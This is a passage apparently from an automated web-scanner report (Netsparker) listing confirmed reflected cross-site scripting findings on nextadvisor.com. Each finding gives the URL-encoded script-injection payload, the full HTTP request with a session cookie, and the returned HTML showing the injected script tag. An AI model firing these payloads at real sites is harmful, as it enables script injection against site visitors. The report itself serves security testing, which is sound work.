Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000222)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/genealogy_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Genealogy FAQ</h1> <p>Frequently Asked Questions about Genealogy</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Genealogy:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="genealogy"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog201..
- /identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000238)%3C/script%3E

/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000238)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000238)</script>

Request

GET /identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/identity_theft_protection_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6626
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", identity theft protection, identity theft prevention, id theft, id theft protection, child identity theft, identity theft, stolen identity, Identity Guard Total Protection, TrustedID, LifeLock, ProtectMyID.com, ID Patrol, Identity Theft Shield, Identity Guard Good Start" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services/'"--></style></script><script>netsparker(0x000238)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000238)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/identity_theft_protection_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Identity Theft Protection FAQ</h1> <p>Frequently Asked Questions about Identity Theft Protection</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Identity Theft Protection:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="identity_theft_protection_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20..
- /identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000244)%3C/script%3E

/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000244)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000244)</script>

Request

GET /identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6643
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", identity theft protection, identity theft prevention, id theft, id theft protection, child identity theft, identity theft, stolen identity, Identity Guard Total Protection, TrustedID, LifeLock, ProtectMyID.com, ID Patrol, Identity Theft Shield, Identity Guard Good Start" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/identity_theft_protection_services/index.php'"--></style></script><script>netsparker(0x000244)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> 